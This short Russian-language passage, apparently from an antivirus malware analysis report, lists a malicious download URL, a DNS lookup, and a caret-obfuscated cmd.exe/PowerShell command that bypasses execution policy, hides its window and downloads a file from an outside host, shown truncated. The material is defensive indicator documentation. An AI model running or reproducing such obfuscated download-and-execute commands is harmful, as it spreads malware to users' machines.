Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWers^hElL^.^E^XE^ ^-E^xe^CuTIOnPolICY^ b^yp^AS^S -NO^p^rO^f^I^lE -WI^nDo^Ws^Ty^le^ HIDde^n (^n^ew^-^O^b^J^ec^t ^SY^sT^E^M.^N^et.^W^Eb^c^lI^en^T).^Dow^nl^oaD^fiL^e('http://www.d...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^oWers^hElL^.^E^XE^ ^-E^xe^CuTIOnPolICY^ b^yp^AS^S -NO^p^rO^f^I^lE -WI^nDo^Ws^Ty^le^ HIDde^n (^n^ew^-^O^b^J^ec^t ^SY^sT^E^M.^N^et.^W^Eb^c^lI^en^T).^Dow^nl^oaD^fiL^e('http://www.d...' (со скрытым окном)